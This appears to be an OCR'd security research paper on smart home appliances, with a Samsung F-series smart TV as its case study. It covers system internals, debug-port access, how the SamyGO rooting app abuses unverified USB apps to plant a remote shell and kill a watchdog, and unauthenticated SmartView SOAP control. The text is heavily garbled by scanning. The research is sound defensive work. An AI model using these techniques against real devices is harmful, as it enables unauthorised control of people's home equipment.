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ABSTRACT 


Smart home devices are becoming increasingly popular. Sales of 
smart TVs alone are expected to increase to 141 million units in 
2015. This number may be small when compared with sales of 
PCs and mobile devices, but it is an impressive indication of 
what's to come. And it's not only our TVs that are getting 
smarter; our refrigerators, surveillance systems and thermostats 
are becoming ‘smart’ too. They are connected to the Internet. 
They are in the cloud. They have more functionality than ever 
before, and they're making our lives easier. Conversely, they may 
also be providing new opportunities for crime. 


The current upward trend in smart appliance adoption might 
resemble similar historic trends seen with PCs and smartphones. 
At this early stage of the adoption process, we might think that 
the smart devices in our home are safe, but what do we really 
know about them? They are like black boxes and there is very 
little information available about their internals. Worryingly, 
what little published research exists in this area suggests our 
confidence may be misplaced. 


Maybe we won't see prevalent malware on these platforms in the 
near future, but this is not because smart appliances aren't prone 
to attack. It is more about the current expected ROI for malware 
writers. The market for smart appliances isn't even remotely 
close to saturation at this point, so the potential number of 
targets, and therefore incentive to compromise, remains 
relatively low. However, this gives us a good opportunity to think 
about the security of these smart devices and get ahead of the 
game. We can learn important lessons from the history of PCs, 
smartphones and malware. 


In this paper, we discuss the current security status of popular 
smart home appliances (TVs, thermostats and surveillance 
cameras). We share our findings from reverse engineering those 
devices and analysing their defences, including noting possible 
attacks or vulnerabilities (such as memory corruptions, MITM 
issues, etc.). We also elaborate on possible ways to mitigate 
future threats on these increasingly popular platforms. 


INTRODUCTION 


Smart home appliances are becoming increasingly popular as the 
trend of everything being connected continues apace. These 
interconnections, moderated by our mobile devices or networked 
PCs, make our lives more convenient and productive — and this is 
just the start. Imagine the possibilities if you could control and 
monitor all your intelligent appliances and home equipment 
remotely. 


But we might be missing something here. We have put a strong 
emphasis on PC and mobile phone security, and many measures, 


including anti-malware, have been developed to defeat malicious 
software and exploits. Vendors like Microsoft, Apple and Google 
have put significant effort and resources into making their 
products and the ecosystem more secure. The positive cycle of 
bug reporting, fixing and crediting is mostly stable in this space. 
But smart home appliances, such as smart TVs and smart 
refrigerators, are manufactured by large vendors who are not 
familiar with the software industry and its established security 
best practices. Then there are other, smaller vendors who have 
great ideas as to how to make life easier with many different 
Internet-enabled devices, but security may not be at the forefront 
of their minds. Neither of these groups has the experience in 
security that forged the current policies for addressing 
vulnerabilities and malware in the more conventional IT space. 


ANALYSIS TARGET 


Among the growing number of smart appliances, smart TVs have 
shown very impressive sales recently and are projected to 
increase to 141 million units worldwide in 2015 [1]. This 
number is still small compared to the number of PCs and mobile 
devices being sold, but it is a number we can't ignore. For this 
paper, I picked one smart TV model (Samsung F-series) as a 
case study and performed a detailed security assessment. In this 
paper I discuss the attack vectors from the point of view of the 
attackers and malware creators. Hopefully this will give you a 
glimpse into the state of security in this space. 


The target device I chose was a 55UF6350 model purchased 
from a US retail store in 2013. In other words, very typical of the 
sort of TV you might purchase nowadays. This model is usually 
called an F-series (most of the Samsung TV models sold in 2013 
fall into this category). Table 1 shows the basic features of this 
TV. From the specification alone, it almost sounds like it is a 
small computer with huge screen. 


Features 

Processor Dual core (ARMv7) 

Screen size 35" 

AllShare™ Content sharing and screen mirroring 
SmartView Clone view 


Smart phone remote | Yes (requires SmartView app) 
support 


USB HID support Yes 


Motion rate 240 

Network One built-in wireless adapter 

Browser WebKit-based with Flash 11.1 support 
(ActionScript 3.0) 

Installed apps Netflix, Picasa, Skype, YouTube, 
Facebook 


Table 1: Features of Samsung TV model 55UF6350. 


INTERNALS 


The TV runs a Linux operating system, as illustrated in Figure 1, 
which shows the dmesg command result from the TV. There’s 
some interesting information here, like the memory size of 
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Initializing cro subsys cpu 

inux version 3.0.33 (nwlee0sp2) (gcc version 4.6.4 (voLinux.GA1.2012-10-03) ) € 1 SMP PREEMPT Fri 
ug 2 20:57:36 KST 2013 

PU: ARMv7 Processor [413fc090] revision O (ARMv7), cr#18cS3c7d 

PU: VIPT nonallasing data cache, vIPT aliasing instruction cache 

achine: edison 


EM = 0x40200000, 0xC600000 

EM2 = OxASEO0000, 0x1A200000 

addr= 0x40000000 

ems 0x100000 

RAM LENe OxO 

emory policy: ECC disabled, Data cache writealloc 

n node Ô totalpages: 157696 

Normal zone: 4092 pages used for memmap 

Normal zone: 0 pa es reserved 

Normal zone: 153604 pages, LIFO batch:31 

ERCPU: Embedded 7 pages/cpu @c0c1a000 s4992 r8192 d15488 u32768 

cpu-alloc: s4992 r8152 d15488 u32768 alloces8*4096 

cpu-alloc: fo) o [0] 1 

uilt 1 zonelists in Zone order, mobility grouping on. Total pages: 153604 
erne] command line: consolestty1,115200 roote/dev/mmcblkOp10 rootfstypessquashf s 
EM«0x40200000,0xC600000 Lx MEM220xA$E00000,0x1A200000 EMAC_MEM=0x40000000, 0x100000 Onboot : 
059.8 SELP_ENABLE=20139120 quiet 

ID hash table entries: 4096 Corder: 2, 16384 bytes} 

entry cache hash table entries: 131072 (order: 7, 524288 bytes) 
Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) 

emory: 198MB 418MB = 616MB total 

emory: 620016k/620016k available, 10768k reserved, OK highmem 

irtual kernel memory layout: 


vector : 000 - Oxffff1000 4 kB 
fixmap : Oxfffo0000 - Oxfffeo000 896 kB 
DMA : Oxffco0000 - Oxffeo0000 2 MB 
vmalloc : Oxe7000000 - Oxf8000000 272 MB 
lowmem : OxcO000000 - Oxe6800000 616 MB 
modules : Oxbf000000 - O0xcO000000 16 MB 
„init : 0xcO0008000 - 0xc0028000 128 kB 
„text : 0xc0028000 - 0xc033e000 3160 kB 
.data : 0xc033e000 - 0xc035b040 117 kB 


„bss : 0xc035b064 - OxcO40e5d4 718 kB 

SLUB: Genslabs-11, Hwalign=64, Order=0-3, Minobjects=0, CPUS-2, Nodes-i 
Preemptible hierarchical rcu implementation. 

verbose stalled-cPUS detection is disabled. 

R_IRQS:256 

lobal Timer Frequency = 498 MHz 

PU Clock Frequency = 996 MHZ 

re = 498000000, mult 2156108080, shift. 30 

sched clock: 32 bits at 498MHz, resolution 2ns, wraps every 8624ms 
console: colour dummy device 80x30 

console [tty1] enabled 


Figure 1: The dmesg command result from the TV. 


rootfs on / t rootfs (rw) 
//dev/root on Yt 


) 
tmpfs on /dtv type tmpfs (rw,relatime,s12e-40960k 
mot " pf bpd Ftd rar ++) 
relatime,size#2048k) 


none on /sys/fs/cgroup t egroup (rw,relatime,cpu) 

ESEA - poe ac type emncfs (ro relatime) 
Vdev/mncblkOpl7 on /mtd exe type squashfs (ro,relatime) 
Vdev/mmcblkOpl6 on /mtd rwarea type emecfs (rw,relatime) 
V dev/mncblkópl4 on /mtd drmregion.a type emmcfs (rw,relatime 
Vdev/mncblkOpl5 on /mtd drmregion b type emmcfs (rw,relatime 

on /mtd rocommon type squashfs (ro,noexec,relatime) 

Vdev/mncblkOp24 on /mtd contents t emmcfs (rw,relat ime 
hone on rb eA acr t usbfs (rw,relatime) 
V'dev/mncblkOp26 on /mtd .rwcommon type emmcfs (rw,relatime) 
V/dav/loopo on /mtd rwcommon/widgets/manager/10130000000 type squashfs (ro,noexec,relatime) 
Vdev/mncblkOp23 on /mtd emanual type emmcfs (rw,relatime) 
V dev/mncblkO0p25 on /mtd swu type emmcfs (rw,relatime) 
Vdtv/loop4 on /mtd rwcommon/widgets/normal/111199001564 type squashfs gro noexec,reiarime) 
/atv/loops on /mtd_rwcommon/widgets/normal/111199000674 type squashfs (ro,noexec,relatime 


Figure 2: The mount command result from the TV. 


616MB total and an ARMv7 model CPU. The machine doesn’t mounted, some are mounted as read-only and some are mounted 
look as powerful as a PC, but it feels more like an embedded as read-write. 

Linux system. Figure 3 shows the ps command result. An interesting process 
Figure 2 shows the mount command result with a number of like X, which is used for X-Windows, is shown. There are other 
partitions mounted on the system. Of the multiple partitions interesting processes too, like udhcpc (a dhcp client) and 
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d appdata/Runtime/bin/x -logfile /mtd rwarea/xlog.txt -modulepath /mtd appdata/Runt ime/xor 


sheTl»ps -eaf 
PIO USER TIME COMMAND 
1 root 0:00 init 
2 root 0:00 [kthreadd]) 
3 root 0:00 [ksoftirqd/O 
5 root 0:00 [kworker /u:0 
6 root 0:00 [migration/O 
7 root 0:00 [migrartion/1 
9 root 0:00 pote ingd/a 
10 root 0:00 [khelper 
11 root 0:00 [sync_supers 
12 root 0:00 [bd1-default 
13 root 0:00 [kblockd] 
15 root 0:00 korv toga) 
16 root 0:00 [kswapdd] 
17 root 0:00 [fsnotify mark] 
18 root 0:00 [vdbinder 
19 root 0:00 [kworker/0:1] 
20 root 0:09 [mncqd/O 
21 root 0:00 [mncad/ObootÓ 
22 root 0:00 [mncqd/Ooboorti 
25 root 0:00 [kworker /1:1] 
34 root 0:00 -/bin/sh 
60 root 0:00 [kworker /1:2] 
63 root 0:00 [khubd] 
66 root 0:00 (exe) ash /mtd_exe/rc. local 
69 root 0:00 ./servicemanager_csp -vdbinder 
84 root 0:00 oe guae 
88 root 2:25 ./exeAPP -vdbinder 
89 root 2:02 ./exeTv -vdbinder 
91 root 0:00 A ig LMI 
195 root 0:00 [arthek1] 
226 root 0:01 
231 root 0:00 Compositor -vdbinder 
262 root 0:00 (kworker/0:3) 
304 root 0:00 /mtd commlib/WIFI LIB/QCA/wpa supplicant -0n180211 -1p2p0 -c/mtd rwarea/network/p2p. dual. conf 
328 root 0:00 [flush-179:0] 
350 root 0:00 [100p0] 
392 root 0:00 udhcpc -1 wlano -t 5 -T 5 -b 
395 root 0:04 /mtd appext/widgetEngine/widgetEngine 
533 root 0:00 (kworker/u:3) 
$36 root 0:15 d_down/wi dgets /norma1/20131000001 /bin/BrowserLauncher 
652 root 0:08 d down/emps /empwebsrowser /bin/webkitwebProcess 13 
671 root 0:20 /mtd exe/Webkit/webKitwebProcess 12 we 
742 root 0:00 [ARS MON 
920 root 0:00 d exe/webServerApp/bin/lighttpd -D -f /mtd exe/webServerApp/webserver/lighttpd.conf -s 
1107 root 0:00 [loops 
1232 root 0:00 [loops 
1477 root 0:00 ./Mainserver /mtd rwarea/yahoo 
1525 root 0:00 ./PDSServer 
1526 root 0:00 ./Appupdate com. yahoo. connectedtv. updater 
1541 root 0:01 ./BIServer com. yahoo. connectedty. samsungbt 


Figure 3: The ps -eaf command result from the TV. 


WebkitWebProcess (a Webkit process). The process name 
exeAPP (also figured) is responsible for the related operations 
of apps overall, and the process name exeTV is responsible for 
showing television programs. 


Table 2 shows some of the TCP ports on the system, related 
processes and their usage. The exAPP process listens on many 
ports including 55000 and 55001. These ports are used for the 
SmartView application. Other SOAP-related ports from lighttpd 
are mostly for Universal Plug and Play (UPNP) related 
operations. UPNP is a set of network protocols that enables 
network devices to discover each other and perform additional 
operations with each other seamlessly. 


Protocol Port Process Usage 
TCP 6000 X X Windows 
TCP 55000 exeAPP SmartView 
TCP 55001 exeAPP SmartView 
TCP 9090 exeAPP SmartView 
TCP 7616 exeAPP SOAP 
TCP 80 lighttpd SOAP 
TCP 4443 lighttpd SOAP 
TCP 443 lighttpd SOAP 


Table 2: Ports of interest on the TV. 


Information source 


For Samsung TV rooting resources and other general 
information, the Samygo forum (http://www.samygo.tv/) is very 
useful. A lot of information from independent hobbyists is 
accumulated here. 


Get ROOT access on F-series without develop account 
@ by m2tk » Sun Nov 24, 2013 2:27 pm Q [1][2][3][a][s 


T-FXPDEUC-1115.0 is safe 
by Lordbyte » Fri Feb 14, 2014 4:19 pm 


FW 1118.2 for F6xxx models 
by sandan » Thu Feb 13, 2014 9:55 am 


Firmware download list for F Series (T-FXP9DEUC) 
by RadMyRad » Sun Feb 16, 2014 11:14 am 


[How To] Get root access on F series 
@ by juzis » Fri Jul 19, 2013 6:14pm Ql: 


Samygo Widget install failed 
by xanders31 » Fri Nov 01, 2013 11:40 am 


®) 


358 59520 


ees (34) |35) (36 


Figure: 4 Samygo forum. 


Debug port access 


Most embedded devices allow technicians to access firmware 
through hardware interfaces like JTAG or UART ports. In most 
cases, they don’t want end-users to abuse the feature, so it is 
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common for the interfaces to be obfuscated. The Samsung TV is 
known to use a modified version of a serial port called 
EX-LINK (Figure 5). 


Figure 5: EX-LINK port on the back of the TV. 


The schematics for the EX-LINK cable are shown in Figure 6. 
At one end of the cable is a DB9 female connector, and the other 
end uses a stereo audio plug interface. You can easily make a 
cable by combining a DB9 cable and a stereo audio jack cable. 


E] 
2 


J9, > 5 1 

I DONI o 
s (on i = -CONNECTION j ar ad 
1 


(PEMAIL) 


WHITE 

2 

3 RED 2 
5 SPIRAL 3 


Figure 6: EX-LINK cable schematics (source: [2]). 


After building an EX-LINK cable, you need to enable debug 
mode from the TV. As shown in Figure 7, EX-LINK is 
configured in UART mode by default. This needs to be changed 
to debug mode, as shown in Figure 8. 


If everything is working well, you will see a screen similar to 
that shown in Figure 9. More detailed log messages are shown 
in Figure 10. A lot of debug messages from the system processes 
are displayed, which is very helpful when reverse engineering 
system features. Also, with special key sequences, you can gain 
access to the Top-Debug-Menu (TDM). Through the TDM, you 
can control sensitive features of the TV at a very low level. Most 
of this information is available from the Samygo forum. 


Rooting 


To research smart TV internals, gaining access to the system 

shell is essential. To achieve that, I used the SamyGO rooting 
app. Interestingly, the way this app works implies a weakness 
with a Samsung TV security feature. 


First, you download the SamyGO rooting package from the 
Samygo forum site and put the package on a USB thumb stick. 
From the TV, go into the ‘More Apps’ menu. When you plug in 
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Figure 7: RS-232 jack is UART mode by default. 


Pi —-—XXX—À 
a 3 G3 G3 EJUS U 


we V. 
4] ControlPanel: I 
3581 : 


3582 : 
3583 : 


LII:U 5 

: Hi 
[t Main] [line:279 
[t ProcessWpaEven 


»»[91588 
[NET MW/Fata1] 
[NET MW/Fatai] 
[NET MW/Fata1] 
[NET MW/Fata1] 3584 : 
[NET_MW/ Fatal] 3585 : 
WPà State-INACTIVE 
P2p device address- 
address=Sc:a3:9q:31 


ILLLLLLL10]. PWM Di 
ab 
] CherryNet «—— » 


5e:a3:9d:31:18:6c 
:18:6c 

[NET MW/Fata1] 
[NET_MW/ Fatal] 
[NET MW/Fata1] 
[NET MW/Fatal] 
[NET MW/Fatal] 


3586 : 
3587 : 
3589 : 
3588 : 
3590 


[SendEventTostat. 


eMachin ine: 
[t OnEvent] [1ine:2 ote 


[Disconnected 
[t Main] [line 


$ [t ProcessWpaE 
2»[915944] ControlPanel: 


3 wpa supplic 

vent][1ine:1161] WPS-AP. 
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Figure 10: Detailed debug messages from the TV. 
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SynePius Media Hub Facebook 


ea Mi 75 
PANDORA WETFLIX E 
Pandora 7 
" 


WebBrowser em 
cTve 


Netflix. 
=< = 
Ww Du 


Samsung Apps 
SApps — FOXNOW Twitter YouTube ShopTV 


Version : 2.0 | Size: 1.16MB 
Contact Info : m2tk@o2.pl 


Figure 11: SamyGO rooting app. 


your USB stick, it shows the SamyGO application on the 
application list. Figure 11 shows the application icon with the 
name 'SamyGO-F' on the screen. 


Table 3 shows the files inside the SamyGO app. Essentially, a 
TV app is just a ZIP archive file with HTML, JavaScript and 
additional files inside. Samsung TV apps are written in HTML 
and JavaScript. The main code that does the rooting is inside 
index.html and JavaScript\Main.js. 


Name Description 

widget Basic widget information 
(resolution, alpha blending usage) 

config.xml Program configuration (widget id, 
name, description, etc.) 

index.htm Main HTML file loaded 

JavaScript\Main.js Main exploit file in JavaScript code 

data\patch Main patch file (zip format) 

icon\samygo.jpg 


icon\samygo_106.png 


icon\samygo_115.png_ | Program icons 


icon\samygo_85.png 


icon\samygo_95.png 
CSS\Main.css 


CSS file 


Table 3: Main program structure. 


The data\patch file is actually a ZIP archive that contains the 
files shown in Table 4. The remoteSamyGO zip file inside this 
file is another ZIP archive that contains ELF binary files and a 
shell script that is installed on the target machine (Table 5). 
LibSkype.so is a file that replaces the original Skype shared 
library file with a file of the same name. 


Name Description 

AutoStar Dummy AutoStart file 
libSkype.so Skype hooking library file 
remoteSamyGO.zip Main SamyGO package file 
runSamyGO.sh SamyGO package run script 


Table 4: Patch file structure. 


Name Description 

busybox Busybox package (including various utilities, 
etc.) 

remshd Remote shell 

UEP killer.sh | UEP killer 


Table 5: remoteSamyGO.zip file structure. 


The busybox file is a small binary containing many different 
functions including shell and FTP. The remshd file is an ELF 
binary that listens on port 23 and gives out a shell when anyone 
connects to the port. The UEP_killer.sh file is a shell script that 
kills a watchdog process on the system that blocks unauthorized 
processes (killing the watchdog process disables this security 
feature). 


When the program is run, it displays a screen similar to that 
shown in Figure 12. It overwrites Skype's shared library file 
(libSkype.so) with its own version. Whenever Skype runs on the 
TV, the main Skype binary loads this replaced shared library and 
runs the SamyGO app's code inside it. The shared library runs 
its own code for installing a remote shell and providing other 
features. 


= Kingst Tr 
ton Data’ veler 2.0, Mies partitions 1 
. 
Setup SamyGO flex Fev rereee 


steve 
QU eet ttt et eese eee Le 


Figure 12: Rooting process from the rooting program. 


How rooting works and its security implications 


You might be wondering how this rooting process is possible. 
The cause of the problem is that when a USB stick is inserted, 
the More Apps feature does not verify the applications on the 
USB drive — it skips the application verification process and lets 
the user run the program(s). Moreover, the process has root 
privileges. The TV apps are written in HTML and JavaScript, 
and the underlying system exposes JavaScript objects that 
support network, display and file system access, etc. 


The SamyGO app first loads the SAMSUNG-INFOLINK- 
FILESYSTEM object, as shown at line 11 in Figure 13. 
Through this object, the JavaScript code can perform file- 
system-related operations. After that, as shown at line 15 in 
Figure 13, the HTML page calls the Main.onLoad JavaScript. 


Figure 14 shows that the filePlugin variable is resolved from the 
previous SAMSUNG-INFOLINK-FILES YSTEM object. 


Line 156 in Figure 15 shows how the Unzip method from this 
object can be used. Basically, you can extract an arbitrary ZIP 
file to an arbitrary folder. 
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)!" onunlo 


void(8);" ids"anchor" 


Main.onLoad - functic 1 


document.getElementById 
filePlugin 

showTitle 

widgetAPI 


function unzip( 
var command 
eval (command); 
acted '" from 
sult; 


function root ( UT 
a Y coke Ok kk kk kk Root Sa 


" /runSam 
" /remote 


e-'color:red'»Some a 
olor:red'»Read the rootir 


MSUNG-IN NK-F SYSTEM" »«/ 


AMSUNG - INFOLI NK - STORAGE" » « / 


s not proc 


; procedur 


n.GetTotalSize() 


The target location for the ZIP operation is shown in Figure 16. 
This path is where the Skype engine's files, including the shared 


library, are stored. 


The rootSamyGO function from the script extracts a 
*data/patch' file to the Skype engine's location, overwriting the 
libSkype.so file. Now, when the Skype program runs on the 
system, it loads the SamyGO version of the libSkype.so shared 


library. 


SMARTVIEW FLAW 


SmartView is a feature of Samsung TVs that lets you enjoy TV 
content from your PC or smart phone. An iPhone app (Figure 
18) and a PC application (Figure 19) are available. The 
SmartView feature is related to other features like AllShare, etc. 


e.«/b 


filePlugin.GetUsed: 


SAMSUNG 


Figure 18: SmartView iPhone App. 
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TV- Samsung LED55 


Figure 19: SmartView PC application. 


Frame Number Time Date Local Adjusted Time Offset Process Name 


3 11:23:11 AM 5/25/2014 0.0128345 — SmartView.App.exe 
7 11:23:11 AM 5/25/2014 — 0.3124502  SmartView.App.exe 
10 11:23:12 AM 5/25/2014 0.6126393  SmartView.App.exe 
71 11:23:18 AM 5/25/2014 — 7.0008754 SmartView.App.exe 
73 11:23:18 AM 5/25/2014 — 7.3011188 SmartView.App.exe 
75 11:23:19 AM 5/25/2014 7.6011015 — SmartView.App.exe 


Source Destination Protocol Name Description 

192.168.1.19 239.255.255.250 SSOP SSOP :Request, M-SEARCH * 
192.166.1.19 239.255.255.250 SSDP SSOP :Request, M-SEARCH * 
192,.168.1.19 239.255.255.250 SSDP SSOP :Request, M-SEARCH * 
192.168.1.19 239.255.255.250 SSOP SSDP:Request, M-SEARCH * 
192.168.1.19 239.255.255.250 SSOP SSDP:Request, M-SEARCH * 
192.168.1.19 239.255.255.250 SSOP SSOP :Request, M-SEARCH * 


Figure 20: M-SEARCH packets. 


M-SEARCH * HTTP/1.1 


MAN: "ssdp:discover" 
MX: 4 


CONTENT-LENGTH: O 


HOST: 239.255.255.250:1900 


ST: urn:samsung. com: device:RemotecontrolReceiver:1 


Figure 21: M-SEARCH packet payload. 


Frome Number Time Date Local Adjusted Time Offset Process Name Source 


5 11:23:11 AM S/25/2014 — 0.1208583  SmartWew.App.exe 192.168.1.9 


Destination 
192.168.1.19 UOP 


Protocol Name Description 
UOP:SrcPort = 57480, DstPort = 1026, Length = 354 


Figure 22: M-SEARCH response. 


The SmartView feature is representative of smart TVs with 
network capability. Looking into how this feature works is 
interesting, as well as a beneficial exercise in order to gain a 
better understanding of the security implications of some 
features of smart TVs. 


SSDP 


Simple Service Discovery Protocol (SSDP [3]) is used for 
discovering and propagating device information on the local 
network. The SmartViewApp application sends M-SEARCH 
requests over the multicast network (Figure 20). 


The payload of the M-SEARCH packets is shown in Figure 21. 
It tries to find Samsung remote control receiver devices. 

The TV replies with additional information about itself using 
the SSDP protocol (Figure 22). 


Figure 23 shows the contents of this reply packet. It has a 
*LOCATION' header that can be used for further operations. 
The URL is ‘http://192.168.1.9:7676/smp_2_’ and the IP 
address of the TV is 192.168.1.9. 


Basic information request 
From the response of the M-SEARCH request, the client can 


HTTP/1.1 200 OK 

|CACHE-CONTROL: max-age-1800 

Date: Thu, O1 Jan 1970 01:00:36 GMT 

EXT: 

LOCATION: http://192.168.1.9:7676/smp. 2.. 

SERVER: SHP, UPnP/1.0, samsung UPnP SDK/1.0 

ST: urn:samsung. com:device:MalnTvserver2:1 

USN: uuid:Qa21fe80-00aa-1000-bb3d- 
f47b5e7620f8::urn:samsung. com:device:MainTVserver2:1 
Content-Length: 0 


Figure 23: M-SEARCH response payload. 


determine the URL for more operations. It tries to connect to 
and request information from the TV by sending a simple GET 
request to this URL (Figure 24). 


USER-AGENT: SEC_HHP_CRAZYCOOKIE/1.0 
CEPT-LANGUAGE: en-us 


Figure 24: Smp_2_ application request. 


The result of this GET request is shown in Figure 25. The 
message contains basic device information including model 
number and a detailed description of the device. Also note that 
there is a service entry named urn:samsung.com:serviceld: 
MainTVAgent2. The entry has a controlURL of /smp 4 . This 
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URL is where the client can perform additional SOAP DeleteRecordedItem 
operations. 
P DeleteSchedule 

lHTTP/1.1 200 OK 
'ONTENT-LANGUAGE: UTF-8 DestroyGroupOwner 
(CONTENT-TYPE: rexel; charset-"utf-8" 
'ONTENT-LENGTH: 1 
Date: Thu, O1 Jan 1970 01:00:38 GuT EnforceAKE 


connection: close 
SERVER: SHP, UPnP/1.0, samsung UPnP SDK/1.0 


<?xml version-"1.0"?» 


<specversion> 
<major>1</major> 
<minor>0</minor> 
</specversion> 
<device> 
<deviceType>urn: samsung. com: device :MainTvSer ver 2 :1</deviceType> 
<friendlyName>[Tv]Samsung LEDS5</friendlyName> 
<manufacturer>Samsung Electronics«/manufacturer» 
«manuf acturerURL-http: //www. samsung. com</manuf actur er URL» 
<modelDescripti ME DTV MainTVSserver2«/modelDescription» 
«modelName-UN55F6300«/mode Name» 
<mode1Number>1. 0«/modelNumber 
«modelURL-http: / /www. samsung. com«/modelURL- 
<serialNumber>20100621</serialNumber> 
«UDN»uuid:0a21fe80-00aa-1000-bb3d-f47b5e7620f 8</UDN> 
«UPC»123456789012«/UPC- 
<sec: devi ceID>BDCHCBZODCVXU</sec:deviceID> 
«sec:ProductCap»Browser , Y2013«/sec:ProductCap» 
<serviceList> 
<service> 
<serviceType>urn: samsung. com:service:MainTvAgent2:1</serviceType> 
<serviceld>urn: samsung. Com:serviceld:MainTvAgent2</serviceld> 
«controlURL-/smp 4 «/controlURL» 
<event SubURL>/smp_5_</eventSubURL> 
<SCPDURL>/smp_3_</SCPDURL> 
</service> 
I«/serviceList» 
I«/device» 
|</root> 


root xmins-"urn:schemas-upnp-org:device-1-0" xmlns:sec-"http://www. sec. co. kr/dina"> 


Figure 25: Smp_2_ application response. 


Advanced operations 
Sosmp 4 is a SOAP application that provides additional 


operations. Figure 26 shows one of the requests: it is sending a 


GetDTVInformation request to the TV using a SOAP message. 


The response to the GetDTV Information request is shown in 


GetACRCurrentChannelName 
GetACRCurrentProgramName 
GetACRMessage 
GetAPInformation 
GetAllProgramInformationURL 
GetAvailableActions 
GetBannerInformation 
GetChannelListURL 
GetCurrentBrowserMode 
GetCurrentBrowserURL 
GetCurrentExternalSource 
GetCurrentMainTV Channel 
GetCurrentProgramInformationURL 
GetDTV Information 
GetDetailProgramInformation 
GetFilteredProgramURL 


. ; m : tMBRDeviceList 
Figure 27. The response contains basic information about the PR or 
features the TV supports. It includes the video format it GetMBRDongleStatus 
supports, TV version, and the presence of additional networking e GetRecordChannel 


ports like Bluetooth. 


* GetScheduleListURL 


There are many different services available through this 


application, including the following functions: 


* AddSchedule 


* GetSourceList 


* PlayRecordedItem 


* ChangeSchedule * RunBrowser 


POST /smp 4 | HTTP/1.0 

HOST: 192.168.1.9:7676 

ICONTENT-LENGTH: 248 

CONTENT-TYPE: text/xml;charset-"utf-8" 

USER-AGENT: DLNADOC/1.50 SEC. HHP. CRAZYCOOKIE/1.0 

ISOAPACTION: "urn:samsung.com:service:MainTVAgent2 :1éGetDTVInformation" 


I«s:Envelope xmlns:s-"http: //schemas. xmlsoap. org/soap/envelope/" 
s :encodingstyle-"http: //schemas. xml soap. org/soap/encoding/"><s :Body»«u:GetDTVInformation 
xmlns:u-"urn:samsung. com:service :MainTvAgent2:1'></u:GetDTVInformation></s : Body></s :Envelope- 


Figure 26: Smp_4_ application request. 


IHTTP/1.1 200 OK 

ontent-Length: 1594 

Content-Type: text/xml; charset-"utf-8" 
DATE: Thu, 01 Jan 1970 01:00:40 GMT 


<?xml version="1.0" encoding="utf-8"?><s:Envelope xmlns:s-"http://schemas. xmlsoap. org/soap/envelope/" 
s: rl ae de e-"http: //schemas. xmlsoap. org/soap/encoding/"> 
<s : Boi 


ixm1ns :u="urn:samsung. com:service:MainTVAgent2 :1"»«Result»OK«/Result»«DTVInformation-&lt; ?xml 
lversion=&quot;1.0&quot; encoding-&quot;UTF-8&quot; ? 


is&lt; /supportGetAvailab NEE Se Supreme TRUE wore Aen i pelak iea a REEL or LOCO ris H E t;/T| 
argetLocation&gt; Slt; SupportAmtM le&gt;1,2& ti /Suppor tantModeagt; &1t; Supportchsort&gt; No&Tt; /sup ortChsort&gt; &lt;S 
iannelInfo&gt; No&lt; /Supportchannelinfo&gt; &lt; Suppor 


Figure 27: Smp 4 | application response. 
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rinde & f Color Rules AB Aliases ~ 23 Columns + 

Fra... Time Date Local Adjusted Time Offset Process Name Source Destination Pro... Description = 

22 11:23:15 AM 5/25/2014 — 3,6132819  SmartView.App.exe 192,168,1.19 ., StcPort=54012, DstPort=55000, PayloadLen=0, Se: 
3.6147120 SrcPort- 55000, DstPort=54012, PayloadLer 


3.6181050 


‘SmartV¥iew.App.exe +, SrcPort=S5000, DstPort=54012, PayloadLen=0, Se 


30 1 5AMSj25/2014 4.3801881  SmartView.App.exe 192.168.1.19 TCP il +) SrcPort=55000, DstPort=54012, PayloadLen=226, Sec 
31 11:23:15 AM 5/25/2014 — 4.3820181  Smartview.App.exe 192.168.1.9 TCP TCP:Flags: SrcPort=54012, DstPort=55000, PayloadLen=89, Seq: 
32 11 5AM5/25/2014 4,3832965  SmartView.App.exe 192.168.1.19 TCP TCP:Flags: 

34 11:23:15 AM 5/25/2014 — 4.4070723  SmartView.App.exe 192.168.1.19 TCP  TCP:Flags: SrcPort=55000, DstPort=54012, PayloadLen-21, Seq: 
36 11 6 AM 5/25/2014 4,6075203  SmartView.App.exe 192.168.1.19 TCP TCP:[ReT 4 Flags. ..AP..., SrcPort-55000, DstPort=54012, Pay 
37 il 64M 5/25/2014 4,6075391  SmartView.App.exe 192.168.1.9 TCP TCP:Flags: + StcPort-54012, DstPort-55000, PayloadLen=0, Seq: _ 
P 11:93:93 AM C/2G/2n14 — 12 2467140 Smarkiai Ann axe- 199 1421.0 Tro GreDork—EAN1? NetOavtK—EENNN Davlaadi en—51 Sec: 
Frame Details x 


SrcPort: 54012 
DstPort: 55000 


«[ " 


SequenceNumber: 3153586113 (OxE 
AcknowledgementNumber: 31336531 __ 
DataOffset: 80 (0x50) 


Flags: ...AP... EIE c1 3 
Window: 4380 (scale factor Ox2) ||0062 F 
Checksum: Ox4EC?, Good 0070 
UrgentPointer: 0 (0x0) 007E = 

dy TCPPavlead: SaureeParr = tani? 7 


Sel Bytes: x 
sento E 


1.1.. 


iziDecodeAs | EE Width ~ [Prot Off: 20 (0x14) Frame Off: 104 (0x68) 
001C 46 78 CF O1 08 O1 00 80 
0024 10 OB A9 57 12 48 5C A3 
0038 AA AA 03 00 OO OO 08 00 


0046 40 00 80 06 21 D1 CO A8 


Txl.i.. 


.E 


' 2 Frame Comments | [48] Hex Details 


Figure 28: Remote controller packets. 


^ 


Fra... Time Date Local Adjusted Time Offset Process Name Source Destination Pro... Description 

22 11:23:15 AM 5/25/2014 — 3.6132819  SmartView.App.exe —192.168.1.19 192.168.1.9 TCP TCP:Flags=. S., SrcPort=54012, DstPort=55000, PayloadLen=0, Sequel 
23 3.6147120 — SmartView.App.exe i 192.168.1.19 — TCP  TCP:Flags SrcPort- 55000, DstPort=54012, PayloadLen-0, Seq: 
24 3.6147807  SmartView.App.exe 192.1: 9 TCP TCP:Flags: ircPort=54012, DstPort-55000, PayloadLen-0, Seq=< 
25 3.6164590 — SmartView.App.exe « 192.1 9 TCP TCP:Flags: SrcPort=54012, DstPort-55000, PayloadLen=27, Seq= 
26 3,.6181050 SmartView.App.exe 192. 9 192.168.1.19 TCP TCP:Flags: ircPort- 55000, DstPort=54012, PayloadLen-0, Seq=2 
30 11:23:15 AM 5/25/2014 — 4.3801881  SmartView.App.exe 192.168.1.9 192.168.1.19 TCP TCP:Flags-. +, StcPort=55000, DstPort=54012, PayloadLen-226, Sec 
31 11:23:15 AM 5/25/2014 — 4.3820181  SmartView.App.exe 192.168.1,19 192.168.1.9 TCP TCP:Flags-. +, SrcPort=54012, DstPort=55000, PayloadLen-89, Seq: 
